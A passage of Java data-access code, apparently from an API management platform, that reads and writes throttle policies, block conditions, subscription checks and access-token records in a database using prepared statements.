connection, null); } } /** * Updates global throttle policy in database * * @param policy updated policy obejct * @throws APIManagementException */ public void updateGlobalPolicy(GlobalPolicy policy) throws APIManagementException { Connection connection = null; PreparedStatement updateStatement = null; InputStream siddhiQueryInputStream; try { byte[] byteArray = policy.getSiddhiQuery().getBytes(Charset.defaultCharset()); int lengthOfBytes = byteArray.length; siddhiQueryInputStream = new ByteArrayInputStream(byteArray); connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(false); if (!StringUtils.isBlank(policy.getPolicyName()) && policy.getTenantId() != -1) { updateStatement = connection.prepareStatement(SQLConstants.UPDATE_GLOBAL_POLICY_SQL); } else if (!StringUtils.isBlank(policy.getUUID())) { updateStatement = connection.prepareStatement(SQLConstants.UPDATE_GLOBAL_POLICY_BY_UUID_SQL); } else { String errorMsg = "Policy object doesn't contain mandatory parameters. At least UUID or Name,Tenant Id" + " should be provided. Name: " + policy.getPolicyName() + ", Tenant Id: " + policy.getTenantId() + ", UUID: " + policy.getUUID(); log.error(errorMsg); throw new APIManagementException(errorMsg); } updateStatement.setString(1, policy.getDescription()); updateStatement.setBinaryStream(2, siddhiQueryInputStream, lengthOfBytes); updateStatement.setString(3, policy.getKeyTemplate()); if (!StringUtils.isBlank(policy.getPolicyName()) && policy.getTenantId() != -1) { updateStatement.setString(4, policy.getPolicyName()); updateStatement.setInt(5, policy.getTenantId()); } else if (!StringUtils.isBlank(policy.getUUID())) { updateStatement.setString(4, policy.getUUID()); } updateStatement.executeUpdate(); connection.commit(); } catch (SQLException e) { if (connection != null) { try { connection.rollback(); } catch (SQLException ex) { // Rollback failed. Exception will be thrown later for upper exception log.error("Failed to rollback the update Global Policy: " + policy.toString(), ex); } } handleException("Failed to update global policy: " + policy.getPolicyName() + '-' + policy.getTenantId(), e); } finally { APIMgtDBUtil.closeAllConnections(updateStatement, connection, null); } } /** * Retrieves list of available policy names under <code>policyLevel</code> * and user <code>username</code>'s tenant * * @param policyLevel policY level to filter policies * @param username username will be used to get the tenant * @return array of policy names * @throws APIManagementException */ public String[] getPolicyNames(String policyLevel, String username) throws APIManagementException { List<String> names = new ArrayList<String>(); Connection conn = null; PreparedStatement ps = null; ResultSet rs = null; String sqlQuery = null; int tenantID = APIUtil.getTenantId(username); try { conn = APIMgtDBUtil.getConnection(); if (PolicyConstants.POLICY_LEVEL_API.equals(policyLevel)) { sqlQuery = SQLConstants.ThrottleSQLConstants.GET_API_POLICY_NAMES; } else if (PolicyConstants.POLICY_LEVEL_APP.equals(policyLevel)) { sqlQuery = SQLConstants.GET_APP_POLICY_NAMES; } else if (PolicyConstants.POLICY_LEVEL_SUB.equals(policyLevel)) { sqlQuery = SQLConstants.GET_SUB_POLICY_NAMES; } else if (PolicyConstants.POLICY_LEVEL_GLOBAL.equals(policyLevel)) { sqlQuery = SQLConstants.GET_GLOBAL_POLICY_NAMES; } ps = conn.prepareStatement(sqlQuery); ps.setInt(1, tenantID); rs = ps.executeQuery(); while (rs.next()) { names.add(rs.getString(ThrottlePolicyConstants.COLUMN_NAME)); } } catch (SQLException e) { handleException("Error while executing SQL", e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, rs); } return names.toArray(new String[names.size()]); } /** * Sets deployment status vaule of a policy in database. * * @param policyLevel policy level * @param policyName name of the policy * @param tenantId tenant id of the policy * @param isDeployed deployment status. <code>true</code> if deployment successful, <code>false</code> if not * @throws APIManagementException */ public void setPolicyDeploymentStatus(String policyLevel, String policyName, int tenantId, boolean isDeployed) throws APIManagementException { Connection connection = null; PreparedStatement statusStatement = null; String query = null; if (PolicyConstants.POLICY_LEVEL_APP.equals(policyLevel)) { query = SQLConstants.UPDATE_APPLICATION_POLICY_STATUS_SQL; } else if (PolicyConstants.POLICY_LEVEL_SUB.equals(policyLevel)) { query = SQLConstants.UPDATE_SUBSCRIPTION_POLICY_STATUS_SQL; } else if (PolicyConstants.POLICY_LEVEL_API.equals(policyLevel)) { query = SQLConstants.ThrottleSQLConstants.UPDATE_API_POLICY_STATUS_SQL; } else if (PolicyConstants.POLICY_LEVEL_GLOBAL.equals(policyLevel)) { query = SQLConstants.UPDATE_GLOBAL_POLICY_STATUS_SQL; } try { connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(false); statusStatement = connection.prepareStatement(query); statusStatement.setBoolean(1, isDeployed); statusStatement.setString(2, policyName); statusStatement.setInt(3, tenantId); statusStatement.executeUpdate(); connection.commit(); } catch (SQLException e) { if (connection != null) { try { connection.rollback(); } catch (SQLException ex) { // Rollback failed. Exception will be thrown later for upper exception log.error("Failed to rollback setting isDeployed flag: " + policyName + '-' + tenantId, ex); } } handleException("Failed to set deployment status to the policy: " + policyName + '-' + tenantId, e); } finally { APIMgtDBUtil.closeAllConnections(statusStatement, connection, null); } } /** * Populates common attribute data of the <code>policy</code> to <code>policyStatement</code> * * @param policyStatement prepared statement initialized of policy operation * @param policy <code>Policy</code> object with data * @throws SQLException */ private void setCommonParametersForPolicy(PreparedStatement policyStatement, Policy policy) throws SQLException { policyStatement.setString(1, policy.getPolicyName()); if (!StringUtils.isEmpty(policy.getDisplayName())) { policyStatement.setString(2, policy.getDisplayName()); } else { policyStatement.setString(2, policy.getPolicyName()); } policyStatement.setInt(3, policy.getTenantId()); policyStatement.setString(4, policy.getDescription()); policyStatement.setString(5, policy.getDefaultQuotaPolicy().getType()); //TODO use requestCount in same format in all places if (PolicyConstants.REQUEST_COUNT_TYPE.equalsIgnoreCase(policy.getDefaultQuotaPolicy().getType())) { RequestCountLimit limit = (RequestCountLimit) policy.getDefaultQuotaPolicy().getLimit(); policyStatement.setLong(6, limit.getRequestCount()); policyStatement.setString(7, null); } else if (PolicyConstants.BANDWIDTH_TYPE.equalsIgnoreCase(policy.getDefaultQuotaPolicy().getType())) { BandwidthLimit limit = (BandwidthLimit) policy.getDefaultQuotaPolicy().getLimit(); policyStatement.setLong(6, limit.getDataAmount()); policyStatement.setString(7, limit.getDataUnit()); } policyStatement.setLong(8, policy.getDefaultQuotaPolicy().getLimit().getUnitTime()); policyStatement.setString(9, policy.getDefaultQuotaPolicy().getLimit().getTimeUnit()); //policyStatement.setBoolean(9, APIUtil.isContentAwarePolicy(policy)); policyStatement.setBoolean(10, policy.isDeployed()); if (!StringUtils.isBlank(policy.getUUID())) { policyStatement.setString(11, policy.getUUID()); } else { policyStatement.setString(11, UUID.randomUUID().toString()); } } /** * Populated common attributes of policy type objects to <code>policy</code> * from <code>resultSet</code> * * @param policy initiallized {@link Policy} object to populate * @param resultSet {@link ResultSet} with data to populate <code>policy</code> * @throws SQLException */ private void setCommonPolicyDetails(Policy policy, ResultSet resultSet) throws SQLException { QuotaPolicy quotaPolicy = new QuotaPolicy(); String prefix = ""; if (policy instanceof APIPolicy) { prefix = "DEFAULT_"; } quotaPolicy.setType(resultSet.getString(prefix + ThrottlePolicyConstants.COLUMN_QUOTA_POLICY_TYPE)); if (resultSet.getString(prefix + ThrottlePolicyConstants.COLUMN_QUOTA_POLICY_TYPE) .equalsIgnoreCase(PolicyConstants.REQUEST_COUNT_TYPE)) { RequestCountLimit reqLimit = new RequestCountLimit(); reqLimit.setUnitTime(resultSet.getInt(prefix + ThrottlePolicyConstants.COLUMN_UNIT_TIME)); reqLimit.setTimeUnit(resultSet.getString(prefix + ThrottlePolicyConstants.COLUMN_TIME_UNIT)); reqLimit.setRequestCount(resultSet.getInt(prefix + ThrottlePolicyConstants.COLUMN_QUOTA)); quotaPolicy.setLimit(reqLimit); } else if (resultSet.getString(prefix + ThrottlePolicyConstants.COLUMN_QUOTA_POLICY_TYPE) .equalsIgnoreCase(PolicyConstants.BANDWIDTH_TYPE)) { BandwidthLimit bandLimit = new BandwidthLimit(); bandLimit.setUnitTime(resultSet.getInt(prefix + ThrottlePolicyConstants.COLUMN_UNIT_TIME)); bandLimit.setTimeUnit(resultSet.getString(prefix + ThrottlePolicyConstants.COLUMN_TIME_UNIT)); bandLimit.setDataAmount(resultSet.getInt(prefix + ThrottlePolicyConstants.COLUMN_QUOTA)); bandLimit.setDataUnit(resultSet.getString(prefix + ThrottlePolicyConstants.COLUMN_QUOTA_UNIT)); quotaPolicy.setLimit(bandLimit); } policy.setUUID(resultSet.getString(ThrottlePolicyConstants.COLUMN_UUID)); policy.setDescription(resultSet.getString(ThrottlePolicyConstants.COLUMN_DESCRIPTION)); policy.setDisplayName(resultSet.getString(ThrottlePolicyConstants.COLUMN_DISPLAY_NAME)); policy.setPolicyId(resultSet.getInt(ThrottlePolicyConstants.COLUMN_POLICY_ID)); policy.setTenantId(resultSet.getInt(ThrottlePolicyConstants.COLUMN_TENANT_ID)); policy.setTenantDomain(IdentityTenantUtil.getTenantDomain(policy.getTenantId())); policy.setDefaultQuotaPolicy(quotaPolicy); policy.setDeployed(resultSet.getBoolean(ThrottlePolicyConstants.COLUMN_DEPLOYED)); } public boolean isPolicyExist(String policyType, int tenantId, String policyName) throws APIManagementException { Connection connection = null; PreparedStatement isExistStatement = null; boolean isExist = false; String policyTable = null; if (PolicyConstants.POLICY_LEVEL_API.equalsIgnoreCase(policyType)) { policyTable = PolicyConstants.API_THROTTLE_POLICY_TABLE; } else if (PolicyConstants.POLICY_LEVEL_APP.equalsIgnoreCase(policyType)) { policyTable = PolicyConstants.POLICY_APPLICATION_TABLE; } else if (PolicyConstants.POLICY_LEVEL_GLOBAL.equalsIgnoreCase(policyType)) { policyTable = PolicyConstants.POLICY_GLOBAL_TABLE; } else if (PolicyConstants.POLICY_LEVEL_SUB.equalsIgnoreCase(policyType)) { policyTable = PolicyConstants.POLICY_SUBSCRIPTION_TABLE; } try { String query = "SELECT " + PolicyConstants.POLICY_ID + " FROM " + policyTable + " WHERE TENANT_ID =? AND NAME = ? "; connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(true); isExistStatement = connection.prepareStatement(query); isExistStatement.setInt(1, tenantId); isExistStatement.setString(2, policyName); ResultSet result = isExistStatement.executeQuery(); if (result != null && result.next()) { isExist = true; } } catch (SQLException e) { handleException("Failed to check is exist: " + policyName + '-' + tenantId, e); } finally { APIMgtDBUtil.closeAllConnections(isExistStatement, connection, null); } return isExist; } public boolean isPolicyDeployed(String policyType, int tenantId, String policyName) throws APIManagementException { Connection connection = null; PreparedStatement isExistStatement = null; boolean isDeployed = false; String policyTable = null; if (PolicyConstants.POLICY_LEVEL_API.equalsIgnoreCase(policyType)) { policyTable = PolicyConstants.API_THROTTLE_POLICY_TABLE; } else if (PolicyConstants.POLICY_LEVEL_APP.equalsIgnoreCase(policyType)) { policyTable = PolicyConstants.POLICY_APPLICATION_TABLE; } else if (PolicyConstants.POLICY_LEVEL_GLOBAL.equalsIgnoreCase(policyType)) { policyTable = PolicyConstants.POLICY_GLOBAL_TABLE; } else if (PolicyConstants.POLICY_LEVEL_SUB.equalsIgnoreCase(policyType)) { policyTable = PolicyConstants.POLICY_SUBSCRIPTION_TABLE; } try { String query = "SELECT " + PolicyConstants.POLICY_IS_DEPLOYED + " FROM " + policyTable + " WHERE TENANT_ID =? AND NAME = ? "; connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(true); isExistStatement = connection.prepareStatement(query); isExistStatement.setInt(1, tenantId); isExistStatement.setString(2, policyName); ResultSet result = isExistStatement.executeQuery(); if (result != null && result.next()) { isDeployed = result.getBoolean(PolicyConstants.POLICY_IS_DEPLOYED); } } catch (SQLException e) { handleException("Failed to check is exist: " + policyName + '-' + tenantId, e); } finally { APIMgtDBUtil.closeAllConnections(isExistStatement, connection, null); } return isDeployed; } /** * Add a block condition * * @param conditionType Type of the block condition * @param conditionValue value related to the type * @param tenantDomain tenant domain the block condition should be effective * @return uuid of the block condition if successfully added * @throws APIManagementException */ public String addBlockConditions(String conditionType, String conditionValue, String tenantDomain) throws APIManagementException { Connection connection = null; PreparedStatement insertPreparedStatement = null; boolean status = false; boolean valid = false; ResultSet rs = null; String uuid = null; try { String query = SQLConstants.ThrottleSQLConstants.ADD_BLOCK_CONDITIONS_SQL; if (APIConstants.BLOCKING_CONDITIONS_API.equals(conditionType)) { String extractedTenantDomain = MultitenantUtils.getTenantDomainFromRequestURL(conditionValue); if (extractedTenantDomain == null) { extractedTenantDomain = MultitenantConstants.SUPER_TENANT_DOMAIN_NAME; } if (tenantDomain.equals(extractedTenantDomain) && isValidContext(conditionValue)) { valid = true; } else { throw new APIManagementException("Couldn't Save Block Condition Due to Invalid API Context " + conditionValue); } } else if (APIConstants.BLOCKING_CONDITIONS_APPLICATION.equals(conditionType)) { String appArray[] = conditionValue.split(":"); if (appArray.length > 1) { String appOwner = appArray[0]; String appName = appArray[1]; if ((MultitenantUtils.getTenantDomain(appOwner).equals(tenantDomain)) && isValidApplication(appOwner, appName)) { valid = true; } else { throw new APIManagementException("Couldn't Save Block Condition Due to Invalid Application " + "name " + appName + " from Application " + "Owner " + appOwner); } } } else if (APIConstants.BLOCKING_CONDITIONS_USER.equals(conditionType)) { if (MultitenantUtils.getTenantDomain(conditionValue).equals(tenantDomain)) { valid = true; } else { throw new APIManagementException("Invalid User in Tenant Domain " + tenantDomain); } } else if (APIConstants.BLOCKING_CONDITIONS_IP.equals(conditionType)) { valid = true; } if (valid) { connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(false); if (!isBlockConditionExist(conditionType, conditionValue, tenantDomain, connection)) { uuid = UUID.randomUUID().toString(); insertPreparedStatement = connection.prepareStatement(query); insertPreparedStatement.setString(1, conditionType); insertPreparedStatement.setString(2, conditionValue); insertPreparedStatement.setString(3, "TRUE"); insertPreparedStatement.setString(4, tenantDomain); insertPreparedStatement.setString(5, uuid); status = insertPreparedStatement.execute(); connection.commit(); status = true; } else { throw new BlockConditionAlreadyExistsException( "Condition with type: " + conditionType + ", value: " + conditionValue + " already exists"); } } } catch (SQLException e) { if (connection != null) { try { connection.rollback(); } catch (SQLException ex) { handleException( "Failed to rollback adding Block condition : " + conditionType + " and " + conditionValue, ex); } } handleException("Failed to add Block condition : " + conditionType + " and " + conditionValue, e); } finally { APIMgtDBUtil.closeAllConnections(insertPreparedStatement, connection, null); } if (status) { return uuid; } else { return null; } } /** * Get details of a block condition by Id * * @param conditionId id of the condition * @return Block conditoin represented by the UUID * @throws APIManagementException */ public BlockConditionsDTO getBlockCondition(int conditionId) throws APIManagementException { Connection connection = null; PreparedStatement selectPreparedStatement = null; ResultSet resultSet = null; BlockConditionsDTO blockCondition = null; try { String query = SQLConstants.ThrottleSQLConstants.GET_BLOCK_CONDITION_SQL; connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(true); selectPreparedStatement = connection.prepareStatement(query); selectPreparedStatement.setInt(1, conditionId); resultSet = selectPreparedStatement.executeQuery(); if (resultSet.next()) { blockCondition = new BlockConditionsDTO(); blockCondition.setEnabled(resultSet.getBoolean("ENABLED")); blockCondition.setConditionType(resultSet.getString("TYPE")); blockCondition.setConditionValue(resultSet.getString("VALUE")); blockCondition.setConditionId(conditionId); blockCondition.setTenantDomain(resultSet.getString("DOMAIN")); blockCondition.setUUID(resultSet.getString("UUID")); } } catch (SQLException e) { if (connection != null) { try { connection.rollback(); } catch (SQLException ex) { handleException("Failed to rollback getting Block condition with id " + conditionId, ex); } } handleException("Failed to get Block condition with id " + conditionId, e); } finally { APIMgtDBUtil.closeAllConnections(selectPreparedStatement, connection, resultSet); } return blockCondition; } /** * Get details of a block condition by UUID * * @param uuid uuid of the block condition * @return Block conditoin represented by the UUID * @throws APIManagementException */ public BlockConditionsDTO getBlockConditionByUUID(String uuid) throws APIManagementException { Connection connection = null; PreparedStatement selectPreparedStatement = null; ResultSet resultSet = null; BlockConditionsDTO blockCondition = null; try { String query = SQLConstants.ThrottleSQLConstants.GET_BLOCK_CONDITION_BY_UUID_SQL; connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(true); selectPreparedStatement = connection.prepareStatement(query); selectPreparedStatement.setString(1, uuid); resultSet = selectPreparedStatement.executeQuery(); if (resultSet.next()) { blockCondition = new BlockConditionsDTO(); blockCondition.setEnabled(resultSet.getBoolean("ENABLED")); blockCondition.setConditionType(resultSet.getString("TYPE")); blockCondition.setConditionValue(resultSet.getString("VALUE")); blockCondition.setConditionId(resultSet.getInt("CONDITION_ID")); blockCondition.setTenantDomain(resultSet.getString("DOMAIN")); blockCondition.setUUID(resultSet.getString("UUID")); } } catch (SQLException e) { if (connection != null) { try { connection.rollback(); } catch (SQLException ex) { handleException("Failed to rollback getting Block condition by uuid " + uuid, ex); } } handleException("Failed to get Block condition by uuid " + uuid, e); } finally { APIMgtDBUtil.closeAllConnections(selectPreparedStatement, connection, resultSet); } return blockCondition; } public List<BlockConditionsDTO> getBlockConditions(String tenantDomain) throws APIManagementException { Connection connection = null; PreparedStatement selectPreparedStatement = null; ResultSet resultSet = null; List<BlockConditionsDTO> blockConditionsDTOList = new ArrayList<BlockConditionsDTO>(); try { String query = SQLConstants.ThrottleSQLConstants.GET_BLOCK_CONDITIONS_SQL; connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(true); selectPreparedStatement = connection.prepareStatement(query); selectPreparedStatement.setString(1, tenantDomain); resultSet = selectPreparedStatement.executeQuery(); while (resultSet.next()) { BlockConditionsDTO blockConditionsDTO = new BlockConditionsDTO(); blockConditionsDTO.setEnabled(resultSet.getBoolean("ENABLED")); blockConditionsDTO.setConditionType(resultSet.getString("TYPE")); blockConditionsDTO.setConditionValue(resultSet.getString("VALUE")); blockConditionsDTO.setConditionId(resultSet.getInt("CONDITION_ID")); blockConditionsDTO.setUUID(resultSet.getString("UUID")); blockConditionsDTO.setTenantDomain(resultSet.getString("DOMAIN")); blockConditionsDTOList.add(blockConditionsDTO); } } catch (SQLException e) { if (connection != null) { try { connection.rollback(); } catch (SQLException ex) { handleException("Failed to rollback getting Block conditions ", ex); } } handleException("Failed to get Block conditions", e); } finally { APIMgtDBUtil.closeAllConnections(selectPreparedStatement, connection, resultSet); } return blockConditionsDTOList; } /** * Update the block condition state true (Enabled) /false (Disabled) given the UUID * * @param conditionId id of the block condition * @param state blocking state * @return true if the operation was success * @throws APIManagementException */ public boolean updateBlockConditionState(int conditionId, String state) throws APIManagementException { Connection connection = null; PreparedStatement updateBlockConditionPreparedStatement = null; boolean status = false; try { String query = SQLConstants.ThrottleSQLConstants.UPDATE_BLOCK_CONDITION_STATE_SQL; connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(false); updateBlockConditionPreparedStatement = connection.prepareStatement(query); updateBlockConditionPreparedStatement.setString(1, state.toUpperCase()); updateBlockConditionPreparedStatement.setInt(2, conditionId); updateBlockConditionPreparedStatement.executeUpdate(); connection.commit(); status = true; } catch (SQLException e) { if (connection != null) { try { connection.rollback(); } catch (SQLException ex) { handleException("Failed to rollback updating Block condition with condition id " + conditionId, ex); } } handleException("Failed to update Block condition with condition id " + conditionId, e); } finally { APIMgtDBUtil.closeAllConnections(updateBlockConditionPreparedStatement, connection, null); } return status; } /** * Update the block condition state true (Enabled) /false (Disabled) given the UUID * * @param uuid UUID of the block condition * @param state blocking state * @return true if the operation was success * @throws APIManagementException */ public boolean updateBlockConditionStateByUUID(String uuid, String state) throws APIManagementException { Connection connection = null; PreparedStatement updateBlockConditionPreparedStatement = null; boolean status = false; try { String query = SQLConstants.ThrottleSQLConstants.UPDATE_BLOCK_CONDITION_STATE_BY_UUID_SQL; connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(false); updateBlockConditionPreparedStatement = connection.prepareStatement(query); updateBlockConditionPreparedStatement.setString(1, state.toUpperCase()); updateBlockConditionPreparedStatement.setString(2, uuid); updateBlockConditionPreparedStatement.executeUpdate(); connection.commit(); status = true; } catch (SQLException e) { if (connection != null) { try { connection.rollback(); } catch (SQLException ex) { handleException("Failed to rollback updating Block condition with condition UUID " + uuid, ex); } } handleException("Failed to update Block condition with condition UUID " + uuid, e); } finally { APIMgtDBUtil.closeAllConnections(updateBlockConditionPreparedStatement, connection, null); } return status; } /** * Delete the block condition given the id * * @param conditionId id of the condition * @return true if successfully deleted * @throws APIManagementException */ public boolean deleteBlockCondition(int conditionId) throws APIManagementException { Connection connection = null; PreparedStatement deleteBlockConditionPreparedStatement = null; boolean status = false; try { String query = SQLConstants.ThrottleSQLConstants.DELETE_BLOCK_CONDITION_SQL; connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(false); deleteBlockConditionPreparedStatement = connection.prepareStatement(query); deleteBlockConditionPreparedStatement.setInt(1, conditionId); status = deleteBlockConditionPreparedStatement.execute(); connection.commit(); status = true; } catch (SQLException e) { if (connection != null) { try { connection.rollback(); } catch (SQLException ex) { handleException("Failed to rollback deleting Block condition with condition id " + conditionId, ex); } } handleException("Failed to delete Block condition with condition id " + conditionId, e); } finally { APIMgtDBUtil.closeAllConnections(deleteBlockConditionPreparedStatement, connection, null); } return status; } /** * Delete the block condition given the id * * @param uuid UUID of the block condition * @return true if successfully deleted * @throws APIManagementException */ public boolean deleteBlockConditionByUUID(String uuid) throws APIManagementException { Connection connection = null; PreparedStatement deleteBlockConditionPreparedStatement = null; boolean status = false; try { String query = SQLConstants.ThrottleSQLConstants.DELETE_BLOCK_CONDITION_BY_UUID_SQL; connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(false); deleteBlockConditionPreparedStatement = connection.prepareStatement(query); deleteBlockConditionPreparedStatement.setString(1, uuid); status = deleteBlockConditionPreparedStatement.execute(); connection.commit(); status = true; } catch (SQLException e) { if (connection != null) { try { connection.rollback(); } catch (SQLException ex) { handleException("Failed to rollback deleting Block condition with condition UUID " + uuid, ex); } } handleException("Failed to delete Block condition with condition UUID " + uuid, e); } finally { APIMgtDBUtil.closeAllConnections(deleteBlockConditionPreparedStatement, connection, null); } return status; } private boolean isValidContext(String context) throws APIManagementException { Connection connection = null; PreparedStatement validateContextPreparedStatement = null; ResultSet resultSet = null; boolean status = false; try { String query = "select count(*) COUNT from AM_API where CONTEXT=?"; connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(false); validateContextPreparedStatement = connection.prepareStatement(query); validateContextPreparedStatement.setString(1, context); resultSet = validateContextPreparedStatement.executeQuery(); connection.commit(); if (resultSet.next() && resultSet.getInt("COUNT") > 0) { status = true; } } catch (SQLException e) { if (connection != null) { try { connection.rollback(); } catch (SQLException ex) { handleException("Failed to rollback checking Block condition with context " + context, ex); } } handleException("Failed to check Block condition with context " + context, e); } finally { APIMgtDBUtil.closeAllConnections(validateContextPreparedStatement, connection, resultSet); } return status; } private boolean isValidApplication(String appOwner, String appName) throws APIManagementException { Connection connection = null; PreparedStatement validateContextPreparedStatement = null; ResultSet resultSet = null; boolean status = false; try { String query = "SELECT * FROM AM_APPLICATION App,AM_SUBSCRIBER SUB WHERE App.NAME=? AND App" + ".SUBSCRIBER_ID=SUB.SUBSCRIBER_ID AND SUB.USER_ID=?"; connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(false); validateContextPreparedStatement = connection.prepareStatement(query); validateContextPreparedStatement.setString(1, appName); validateContextPreparedStatement.setString(2, appOwner); resultSet = validateContextPreparedStatement.executeQuery(); connection.commit(); if (resultSet.next()) { status = true; } } catch (SQLException e) { if (connection != null) { try { connection.rollback(); } catch (SQLException ex) { handleException( "Failed to rollback checking Block condition with Application Name " + appName + " with " + "Application Owner" + appOwner, ex); } } handleException("Failed to check Block condition with Application Name " + appName + " with " + "Application Owner" + appOwner, e); } finally { APIMgtDBUtil.closeAllConnections(validateContextPreparedStatement, connection, resultSet); } return status; } public String getAPILevelTier(int id) throws APIManagementException { Connection connection = null; PreparedStatement selectPreparedStatement = null; ResultSet resultSet = null; String apiLevelTier = null; try { String query = SQLConstants.GET_API_DETAILS_SQL; connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(true); selectPreparedStatement = connection.prepareStatement(query + " WHERE API_ID = ?"); selectPreparedStatement.setInt(1, id); resultSet = selectPreparedStatement.executeQuery(); while (resultSet.next()) { apiLevelTier = resultSet.getString("API_TIER"); } } catch (SQLException e) { if (connection != null) { try { connection.rollback(); } catch (SQLException ex) { handleException("Failed to rollback getting API Details", ex); } } handleException("Failed to get API Details", e); } finally { APIMgtDBUtil.closeAllConnections(selectPreparedStatement, connection, resultSet); } return apiLevelTier; } private boolean isBlockConditionExist(String conditionType, String conditionValue, String tenantDomain, Connection connection) throws APIManagementException { PreparedStatement checkIsExistPreparedStatement = null; ResultSet checkIsResultSet = null; boolean status = false; try { String isExistQuery = SQLConstants.ThrottleSQLConstants.BLOCK_CONDITION_EXIST_SQL; checkIsExistPreparedStatement = connection.prepareStatement(isExistQuery); checkIsExistPreparedStatement.setString(1, tenantDomain); checkIsExistPreparedStatement.setString(2, conditionType); checkIsExistPreparedStatement.setString(3, conditionValue); checkIsResultSet = checkIsExistPreparedStatement.executeQuery(); connection.commit(); if (checkIsResultSet.next()) { status = true; } } catch (SQLException e) { String msg = "Couldn't check the Block Condition Exist"; log.error(msg, e); handleException(msg, e); } finally { APIMgtDBUtil.closeAllConnections(checkIsExistPreparedStatement, null, checkIsResultSet); } return status; } public boolean hasSubscription(String tierId, String tenantDomainWithAt, String policyLevel) throws APIManagementException { PreparedStatement checkIsExistPreparedStatement = null; Connection connection = null; ResultSet checkIsResultSet = null; boolean status = false; try { /*String apiProvider = tenantId;*/ connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(true); String isExistQuery = SQLConstants.ThrottleSQLConstants.TIER_HAS_SUBSCRIPTION; if (PolicyConstants.POLICY_LEVEL_API.equals(policyLevel)) { isExistQuery = SQLConstants.ThrottleSQLConstants.TIER_ATTACHED_TO_RESOURCES_API; } else if (PolicyConstants.POLICY_LEVEL_APP.equals(policyLevel)) { isExistQuery = SQLConstants.ThrottleSQLConstants.TIER_ATTACHED_TO_APPLICATION; } else if (PolicyConstants.POLICY_LEVEL_SUB.equals(policyLevel)) { isExistQuery = SQLConstants.ThrottleSQLConstants.TIER_HAS_SUBSCRIPTION; } checkIsExistPreparedStatement = connection.prepareStatement(isExistQuery); checkIsExistPreparedStatement.setString(1, tierId); checkIsExistPreparedStatement.setString(2, "%" + tenantDomainWithAt); if (PolicyConstants.POLICY_LEVEL_API.equals(policyLevel)) { checkIsExistPreparedStatement.setString(3, tierId); checkIsExistPreparedStatement.setString(4, "%" + tenantDomainWithAt); } checkIsResultSet = checkIsExistPreparedStatement.executeQuery(); if (checkIsResultSet != null && checkIsResultSet.next()) { int count = checkIsResultSet.getInt(1); if (count > 0) { status = true; } } connection.setAutoCommit(true); } catch (SQLException e) { String msg = "Couldn't check Subscription Exist"; log.error(msg, e); handleException(msg, e); } finally { APIMgtDBUtil.closeAllConnections(checkIsExistPreparedStatement, connection, checkIsResultSet); } return status; } /** * Get a list of access tokens issued for given user under the given app of given owner. Returned object carries * consumer key and secret information related to the access token * * @param userName end user name * @param appName application name * @param appOwner application owner user name * @return list of tokens * @throws SQLException in case of a DB issue */ public static List<AccessTokenInfo> getAccessTokenListForUser(String userName, String appName, String appOwner) throws SQLException { List<AccessTokenInfo> accessTokens = new ArrayList<AccessTokenInfo>(5); Connection connection = APIMgtDBUtil.getConnection(); PreparedStatement consumerSecretIDPS = connection.prepareStatement(SQLConstants.GET_ACCESS_TOKENS_BY_USER_SQL); consumerSecretIDPS.setString(1, userName); consumerSecretIDPS.setString(2, appName); consumerSecretIDPS.setString(3, appOwner); ResultSet consumerSecretIDResult = consumerSecretIDPS.executeQuery(); while (consumerSecretIDResult.next()) { String consumerKey = consumerSecretIDResult.getString(1); String consumerSecret = consumerSecretIDResult.getString(2); String accessToken = consumerSecretIDResult.getString(3); AccessTokenInfo accessTokenInfo = new AccessTokenInfo(); accessTokenInfo.setConsumerKey(consumerKey); accessTokenInfo.setConsumerSecret(consumerSecret); accessTokenInfo.setAccessToken(accessToken); accessTokens.add(accessTokenInfo); } return accessTokens; } public String[] getAPIDetailsByContext(String context) { String apiName = ""; String apiProvider = ""; String sql = SQLConstants.GET_API_FOR_CONTEXT_TEMPLATE_SQL; Connection conn = null; PreparedStatement ps = null; ResultSet rs = null; try { conn = APIMgtDBUtil.getConnection(); conn.setAutoCommit(true); ps = conn.prepareStatement(sql); ps.setString(1, context); rs = ps.executeQuery(); if (rs.next()) { apiName = rs.getString("API_NAME"); apiProvider = rs.getString("API_PROVIDER"); } } catch (SQLException e) { log.error("Error occurred while fetching data: " + e.getMessage(), e); } finally { try { conn.setAutoCommit(false); } catch (SQLException e) { log.error("Error occurred while fetching data: " + e.getMessage(), e); } APIMgtDBUtil.closeAllConnections(ps, conn, rs); } return new String[]{apiName, apiProvider}; } /** * Check for the subscription of the user * * @param infoDTO * @param context * @param version * @param consumerKey * @return APIKeyValidationInfoDTO including data of api and application * @throws APIManagementException */ public APIKeyValidationInfoDTO validateSubscriptionDetails(APIKeyValidationInfoDTO infoDTO, String context, String version, String consumerKey, boolean defaultVersionInvoked) throws APIManagementException { String apiTenantDomain = MultitenantUtils.getTenantDomainFromRequestURL(context); if (apiTenantDomain == null) { apiTenantDomain = MultitenantConstants.SUPER_TENANT_DOMAIN_NAME; } int apiOwnerTenantId = APIUtil.getTenantIdFromTenantDomain(apiTenantDomain); String sql; boolean isAdvancedThrottleEnabled = APIUtil.isAdvanceThrottlingEnabled(); if (!isAdvancedThrottleEnabled) { if (defaultVersionInvoked) { sql = SQLConstants.VALIDATE_SUBSCRIPTION_KEY_DEFAULT_SQL; } else { sql = SQLConstants.VALIDATE_SUBSCRIPTION_KEY_VERSION_SQL; } } else { if (defaultVersionInvoked) { sql = SQLConstants.ADVANCED_VALIDATE_SUBSCRIPTION_KEY_DEFAULT_SQL; } else { sql = SQLConstants.ADVANCED_VALIDATE_SUBSCRIPTION_KEY_VERSION_SQL; } } Connection conn = null; PreparedStatement ps = null; ResultSet rs = 